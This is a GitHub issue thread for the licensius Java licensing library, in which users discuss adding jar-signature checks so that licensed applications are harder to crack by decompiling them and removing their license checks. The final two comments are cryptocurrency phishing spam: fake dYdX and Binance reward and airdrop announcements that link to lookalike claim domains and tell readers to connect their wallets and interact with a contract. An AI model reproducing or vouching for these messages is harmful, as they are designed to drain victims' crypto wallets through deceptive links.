### ISSUE TITLE
No check of jar signing

### ISSUE THREAD

**Issue by PhantomYdn** [decebals/licensius#1]
It will be cool if framework can:
1) Check validity of a license (already done)
2) Check validity of a particular jar by comparison of signature of a jar (from which API was invoked) and a license

Right now it's pretty easy to hack application which use this library...

**Comment by decebals** [comment]
> 2) Check validity of a particular jar by comparison of signature of a jar (from which API was invoked) and a license

I need more details. For example I have an application `abc` that uses this license library. One idea is to create in license template a new property `abc.signature=<md5>` where md5 is the signature of a jar (from which API was invoked). Make sense?

**Comment by PhantomYdn** [comment]
Not exactly. There is application with several JARs within it. In every jar there are several invocations for a checking validity of a license. And during every call it will cool to make mentioned calls to prevent any possibility to hack an application:
1) Check license
2) Check that jar from which we have invocation is signed as well be the same key as an license.

I'm asking because I've already did that on my previous project. Without such checking it's comparably easy to hack an application by decompling, removing checks for a license and then packing back. And more over: if library for license checking is not selfsigned - it's sufficient to hack just this particular library.

**Comment by decebals** [comment]
Maybe someone propose a solution for this feature, via PR.

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
